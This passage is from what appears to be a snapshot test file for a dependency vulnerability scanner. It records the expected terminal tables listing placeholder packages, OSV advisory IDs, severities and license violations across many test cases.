╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼────────────────────────────┤ │ MIT │ npm │ mine2 │ 5.9.0 │ path/to/my/second/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 (dev) │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-3 │ 4.3 │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬───────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴───────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/GHSA-123 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ 9 │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/GHSA-123 │ │ │ │ │ │ │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ 8.3 │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/GHSA-123 │ │ │ │ │ │ │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/GHSA-123 │ │ │ │ │ │ │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬───────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼───────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine3 │ 0.10.2-rc │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴───────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/second/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+----------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +-------------------+-----------+---------------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------------+---------+----------------------------+ | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+----------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT, Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | 